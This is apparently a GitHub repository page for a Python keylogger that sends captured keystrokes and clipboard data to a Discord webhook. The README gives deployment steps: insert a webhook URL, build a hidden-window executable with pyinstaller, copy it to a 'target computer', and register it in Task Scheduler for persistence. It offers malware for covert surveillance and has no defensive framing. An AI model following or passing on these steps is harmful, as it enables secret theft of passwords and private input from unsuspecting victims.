aymynx / Keylogger

Keylogger with Discord Webhooks reports

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

Keylogger

Keylogger with Discord Webhooks reports

Requirements

pyinstaller
clipboard
pyperclip
requests
pynput
argparse

Installation

Install requirements with

pip install -r requirements.txt

Makes changes to line 23 with your discord webhook

webhook = "https://discord.com/api/webhooks/..."

Make the .exe file

cd into/current/folder/with/.py
pyinstaller -F -w "main.py"

File will be present in dist

  ..
  |__ build\
  |__ dist\
  |      |__ 'main.exe'    <------
  |__ main.py
  |__ main.spec

The .exe file is ready and can be exercuted in any target computer

Adding to Task Scheduler

Move the files 'main.exe' and 'script.bat' to target computer

..
|__ main.exe
|__ script.bat

Open command line CMD as Administrator and cd into both files directory and run the script

C:\WINDOWS\system32> cd into/directory/with/both_files/
C:\Users\HP\Desktop> script.bat

About

Keylogger with Discord Webhooks reports


Languages

Language:Python 92.9%Language:Batchfile 7.1%